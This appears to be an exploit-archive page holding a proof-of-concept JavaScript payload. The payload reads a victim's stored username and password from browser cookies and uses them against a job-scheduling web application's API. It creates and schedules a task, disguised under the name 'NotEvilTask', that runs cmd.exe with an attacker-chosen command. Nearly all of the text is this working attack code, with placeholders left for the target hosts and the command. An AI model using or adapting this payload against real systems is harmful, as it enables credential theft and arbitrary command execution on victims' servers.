4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / payload-js.txt TXT
console.log('Starting Payload..');

var d = new Date();
userCookie = 'CurUserName';
pwdCookie= 'CurPassword';

var ca = document.cookie.split(';');

function readCookie(name) {
	var nameEQ = name + '=';
	var ca = document.cookie.split(';');
	for(var i=0;i < ca.length;i++) {
		var c = ca[i];
		while (c.charAt(0)==' ') c = c.substring(1,c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
	}
	return null;
}

function makeid(length) {
    var result           = '';
    var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    var charactersLength = characters.length;
    for ( var i = 0; i < length; i++ ) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
   }
   return result;
}

var delay = ( function() {
    var timer = 0;
    return function(callback, ms) {
        clearTimeout (timer);
        timer = setTimeout(callback, ms);
    };
})();

username = decodeURIComponent(readCookie(userCookie));
passwd = readCookie(pwdCookie);
console.log(username + '/' + passwd);

// Get OS Login UID
console.log('[+] Grabbing Login IDs');
var req = new XMLHttpRequest();
req.open('<USERS_METHOD>', '<USERS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var loginName = responseData.items[0].name;
var loginUID = responseData.items[0].uid; // Grab OS Login UID
console.log('[+] OS Login UID Found: ' + loginUID);

// Get Agent UID
console.log('[+] Grabbing Agent IDs');
var req = new XMLHttpRequest();
req.open('<AGENTS_METHOD>', '<AGENTS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var agentName = responseData.items[0].name;
var agentUID = responseData.items[0].uid; // Grab OS Login UID
console.log('[+] Agent UID and Name Found: ' + loginUID + ' ' + agentName);

// Create Task Definition
console.log('[+] Executing Task Creation');
var response = '';
var cmd = '<COMMAND_PAYLOAD>';
var req = new XMLHttpRequest();
req.open('<CREATE_METHOD>', '<CREATE_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send('{&quot;id&quot;:0,&quot;name&quot;:&quot;NotEvilTask&quot;,&quot;uid&quot;:&quot;' + makeid(12) + '&quot;,&quot;enabled&quot;:true,&quot;description&quot;:&quot;&quot;,&quot;type&quot;:&quot;TASK&quot;,&quot;subType&quot;:&quot;TASK_SYSCMD&quot;,&quot;agent&quot;:{&quot;type&quot;:&quot;REMOTE&quot;,&quot;id&quot;:1,&quot;name&quot;:&quot;' + agentName + '&quot;,&quot;uid&quot;:&quot;' + agentUID + '&quot;},&quot;attributes&quot;:{&quot;exitCodes&quot;:&quot;0&quot;,&quot;isCommandScript&quot;:false,&quot;command&quot;:&quot;cmd.exe&quot;,&quot;parameters&quot;:&quot;' + cmd + '&quot;,&quot;startDir&quot;:&quot;C:/windows/system32&quot;,&quot;loadProfile&quot;:true},&quot;folder&quot;:{&quot;id&quot;:2,&quot;name&quot;:&quot;Definitions&quot;},&quot;simulate&quot;:{&quot;simulateTaskRun&quot;:false,&quot;duration&quot;:0},&quot;login&quot;:{&quot;name&quot;:&quot;' + loginName + '&quot;,&quot;uid&quot;:&quot;' + loginUID + '&quot;,&quot;id&quot;:12},&quot;output&quot;:{&quot;return&quot;:false,&quot;interleave&quot;:false,&quot;accumulate&quot;:false,&quot;readFromFile&quot;:false,&quot;filename&quot;:&quot;&quot;,&quot;format&quot;:&quot;&quot;,&quot;amountType&quot;:&quot;&quot;,&quot;amount&quot;:0,&quot;xslStyleSheet&quot;:&quot;&quot;,&quot;stdoutToFile&quot;:false,&quot;stdoutAppend&quot;:false,&quot;stdoutFilename&quot;:&quot;&quot;,&quot;stderrToFile&quot;:false,&quot;stderrAppend&quot;:false,&quot;stderrFilename&quot;:&quot;&quot;},&quot;variables&quot;:[],&quot;resources&quot;:[],&quot;actions&quot;:[]}');
console.log('[+] Success');
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
var taskID = responseData.definition.id; // Grab gen ID
console.log('[+] Grabbed ID: ' + taskID);

// Execute Task
console.log('[+] Executing Task');
var req = new XMLHttpRequest();
req.open('<EXEC_METHOD>', '<EXEC_HOST>' + '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
delay(function(){
  req.send('{&quot;schedDate&quot;:&quot;' + '2022' + '.' + ('0' + (d.getMonth() + 1)).slice(-2) + '.' + ('0' + d.getDate()).slice(-2) + '&quot;,&quot;schedTime&quot;:&quot;' + '01' + '.' + '01' + '.' + '01' + '&quot;,&quot;startOnHold&quot;:false,&quot;perpetual&quot;:false,&quot;skipTriggers&quot;:null}');
}, 3000 ); // end delay
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
console.log('[+] Task Executed Successfully');